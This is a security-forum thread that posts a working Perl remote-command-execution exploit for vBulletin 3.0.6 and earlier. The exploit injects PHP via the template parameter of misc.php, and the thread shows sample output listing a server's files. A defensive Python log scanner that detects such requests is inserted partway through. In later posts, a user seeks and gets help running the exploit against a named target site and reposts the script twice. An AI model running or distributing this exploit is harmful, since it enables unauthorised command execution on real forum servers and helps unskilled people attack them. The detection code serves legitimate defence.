Waraxe IT Security Portal  
vbulletin <=3.0.6 misc.php remote execution (perl)
Posted: Tue Sep 20, 2005 3:27 pm
subzero
Valuable expert
Joined: Mar 16, 2005
Posts: 42

Quote:
#!/usr/bin/perl

# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)
# suBzero@kisobox.com
# Reference: http://www.securityfocus.com/bid/12622/info
#

use IO::Socket;

if (@ARGV < 3)
{
print q(
[+] vBulletin <= 3.0.6 Add templates
[+] suBzero@kisobox.com
[+] Reference: http://www.securityfocus.com/bid/12622/info
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;
);
exit;
}

$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];

$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";

$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";

print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";

$on = 0; #flag

while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";


http://kisobox.com/exploits/vbulletin306.txt
save as .pl

example exploit

C:\>perl vbulletin306.pl xxx /forums/ "ls -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to xxx/forums/
[+] Command ls -la
[+] Exploiting on progress

1000
total 1204
drwxr-xr-x 15 511 root 4096 Sep 13 15:21 .
drwxrwxr-x 54 wwwuser wwwuser 4096 Jul 18 11:18 ..
-rw------- 1 root root 23910 Sep 19 16:01 DEADJOE
drwxr-xr-x 2 root root 4096 Oct 18 2003 admin
drwxr-xr-x 3 root root 4096 Jan 20 2005 admincp
-rw-r--r-- 1 root root 6694 Jan 20 2005 announcement.php
drwxr-xr-x 2 root root 4096 Jan 20 2005 archive
-rw-r--r-- 1 root root 7394 Jan 20 2005 attachment.php
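
A defender-side view of the request this script sends, as an added example that is not part of the original post: a Python scanner that flags misc.php requests whose template parameter carries PHP {${...}} expression syntax and decodes the chr() chain so the attempted command is readable during triage. The log lines, addresses and function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format), not taken from the page.
SAMPLE_LOG = [
    '198.51.100.7 - - [20/Sep/2005:15:30:01 +0000] "GET /forums/misc.php?do=page&template=rules HTTP/1.1" 200 5120',
    '198.51.100.9 - - [20/Sep/2005:15:31:12 +0000] "GET /forums/misc.php?do=page&template={${passthru(chr(105).chr(100))}} HTTP/1.1" 200 812',
    '198.51.100.9 - - [20/Sep/2005:15:31:40 +0000] "GET /forums/misc.php?do=page&template=%7B%24%7Bpassthru(chr(117).chr(110).chr(97).chr(109).chr(101))%7D%7D HTTP/1.1" 200 790',
    '203.0.113.4 - - [20/Sep/2005:15:32:02 +0000] "GET /forums/index.php HTTP/1.1" 200 20480',
]

REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# PHP "complex variable" syntax, which has no place in a template name.
PHP_EXPR_RE = re.compile(r"\$\{|\{\$")
CHR_RE = re.compile(r"chr\((\d{1,3})\)")


def decode_chr_chain(value):
    """Recover the string hidden in a chr(N).chr(M)... chain, or None."""
    nums = CHR_RE.findall(value)
    if not nums:
        return None
    # PHP's chr() wraps its argument modulo 256; mirror that here.
    return "".join(chr(int(n) % 256) for n in nums)


def scan_line(line):
    """Return a finding dict for a suspicious misc.php request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, target = m.groups()
    url = urlsplit(target)
    if not url.path.lower().endswith("/misc.php"):
        return None
    # parse_qs percent-decodes, so raw and URL-encoded requests look the same.
    for value in parse_qs(url.query, keep_blank_values=True).get("template", []):
        if PHP_EXPR_RE.search(value):
            return {"client": client, "path": url.path, "template": value,
                    "decoded_command": decode_chr_chain(value)}
    return None


def scan(lines):
    """Scan an iterable of log lines and return all findings in order."""
    return [f for f in map(scan_line, lines) if f]


if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A hit only shows the request was made; whether it executed depends on the vBulletin version and template settings, so pair it with the response size and any process or file activity from the web server account at the same timestamp.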

Posted: Sat Feb 25, 2006 11:56 am
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

i downloaded perl, put it in c:\perl

however, when i go to properties for command prompt, i change the starting directory to c:\

which comes up as c:\> when i open it. then i type in perl after that, which gives me c:\>perl

it says ''perl is not recognised as an internal or external command, operable programme or batch file''.

i then went back to the properties of the command prompt and changed the default directory to c:\perl

and when i open command prompt i type in after c:\perl>vbulletin306.pl although this merely opens the vbulletin.pl file in to notepad.

i've tried executing the whole line with c:\perl>vbulletin306.pl website.com /forums/ "Is -la" then hit enter... and the same happens, just opens the .pl file in to notepad.

would like to know where i'm going wrong. cheers.

Posted: Sun Feb 26, 2006 4:37 am
subzero
Valuable expert
Joined: Mar 16, 2005
Posts: 42

go to any open folder >> view >> folder option and disable by clicking the extension disable.

change save file to .pl .
i guess your previous file was saved as vb306.pl.txt.
correct me if im wrong.

Posted: Sun Feb 26, 2006 11:53 am
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

It's saved as vb306.pl. Although when I look at the properties, its default program to open with is still 'notepad'. Should that be changed?

Posted: Sun Feb 26, 2006 3:39 pm
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

Quote:

c:\>perl vbulletin306.pl
Backslash found where operator expected at vbulletin306.pl line 1, near "rtf1\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansi\"
Backslash found where operator expected at vbulletin306.pl line 1, near "ansicpg
1252\"
Backslash found where operator expected at vbulletin306.pl line 1, near "deff0\"

Backslash found where operator expected at vbulletin306.pl line 1, near "f0\"
Backslash found where operator expected at vbulletin306.pl line 1, near "fswiss\
"
syntax error at vbulletin306.pl line 1, near "rtf1\"
syntax error at vbulletin306.pl line 1, near "}}"
Execution of vbulletin306.pl aborted due to compilation errors.


i've got it working now, 'perl' that is. However, now there is this error that comes up. Here is the script of the vbulletin306.pl file:

Quote:

{\rtf1\ansi\ansicpg1252\deff0\deflang2057{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1507;}\viewkind4\uc1\pard\f0\fs20 #!/usr/bin/perl\par
\par
# vBulletin <= 3.0.6 Add templates remote execute exploit (perl)\par
# suBzero@kisobox.com\par
# Reference: http://www.securityfocus.com/bid/12622/info\par
#\par
\par
use IO::Socket;\par
\par
if (@ARGV < 3)\par
\{\par
print q(\par
[+] vBulletin <= 3.0.6 Add templates \par
[+] suBzero@kisobox.com\par
[+] Reference: http://www.securityfocus.com/bid/12622/info\par
[+] Usage : vbulletin306.pl example.com /forums/ "uname id" ;\par
); \par
exit;\par
\}\par
\par
$serv = $ARGV[0];\par
$dir = $ARGV[1];\par
$cmd = $ARGV[2];\par
\par
$serv =~ s/(http:\\/\\/)//eg;\par
print "\\n";\par
print " [+] vBulletin 3.0.6 kisobox.com \\r\\n";\par
print " [+] Sending regard to $serv$dir \\r\\n";\par
print " [+] Command $cmd \\r\\n";\par
print " [+] Exploiting on progress \\r\\n";\par
\par
$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this\par
$byte = join('.', map \{ $_ = 'chr('.$_.')' \} unpack('C*', $cmd)); \par
$data = $dir;\par
$data .= "misc.php?do=page&template=\{\\$\{passthru($byte)\}\}";\par
\par
$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\\r\\n";\par
\par
print $sock "GET $data HTTP/1.1\\n";\par
print $sock "Host: $serv\\n";\par
print $sock "Accept: */*\\n";\par
print $sock "Content-Length: ".length($data)." \\n".\par
print $sock "Connection: close\\n\\n";\par
\par
$on = 0; #flag\par
\par
while ($res = <$sock>)\par
\{\par
if ($res =~ /^_END_/) \par
\{ print "---------------------------------------------\\r\\n"; exit();\}\par
if ($on == 1) \{ print "$res"; \}\par
if ($res =~ /^_START_/) \par
\{ $on = 1; \}\par
\}\par
print "[-] Exploit failed \\r\\n";\par
print "---------------------------------------------\\r\\n";\par
}


Is the script perhaps wrong? Although it is the one from kisobox.com/exploits/vbulletin306.txt

Posted: Sun Feb 26, 2006 3:47 pm
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

o.k. Feel as though i'm getting closer. Although I now get this error:

Quote:

C:\>perl vb306.pl site.com /forum/ "Is -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forum/
[+] Command Is -la
[+] Exploiting on progress
Can't locate object method "new" via package "IO::Socket::INET" (perhaps you for
got to load "IO::Socket::INET"?) at vb306.pl line 17.

c:\>


The script I now have in the .pl file is this:

Quote:

$serv = $ARGV[0];
$dir = $ARGV[1];
$cmd = $ARGV[2];

$serv =~ s/(http:\/\/)//eg;
print "\n";
print " [+] vBulletin 3.0.6 kisobox.com \r\n";
print " [+] Sending regard to $serv$dir \r\n";
print " [+] Command $cmd \r\n";
print " [+] Exploiting on progress \r\n";

$cmd = "echo _START_;".$cmd.";echo _END_"; #strOke,dont kill me 4 this
$byte = join('.', map { $_ = 'chr('.$_.')' } unpack('C*', $cmd));
$data = $dir;
$data .= "misc.php?do=page&template={\${passthru($byte)}}";

$sock = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "[-] Connection error\r\n";

print $sock "GET $data HTTP/1.1\n";
print $sock "Host: $serv\n";
print $sock "Accept: */*\n";
print $sock "Content-Length: ".length($data)." \n".
print $sock "Connection: close\n\n";

$on = 0; #flag

while ($res = <$sock>)
{
if ($res =~ /^_END_/)
{ print "---------------------------------------------\r\n"; exit();}
if ($on == 1) { print "$res"; }
if ($res =~ /^_START_/)
{ $on = 1; }
}
print "[-] Exploit failed \r\n";
print "---------------------------------------------\r\n";


Sorry about the number of posts. I'm quite the spammer ;)

Posted: Sun Feb 26, 2006 4:11 pm
lookatmenow
Regular user
Joined: Feb 24, 2006
Posts: 21

Sorted. ;)

I used the text from your quote in that first post, and made that the 'vb306.pl' file. I finally get to the 'exploit part', however I always get 'exploit failed', without the rest of the text following:

Quote:

c:\>perl vb306.pl site.com /forums/ "Is -la"

[+] vBulletin 3.0.6 kisobox.com
[+] Sending regard to site.com/forums/
[+] Command Is -la
[+] Exploiting on progress
[-] Exploit failed
---------------------------------------------

c:\>


Does this mean their forums are patched, to stop this exploit?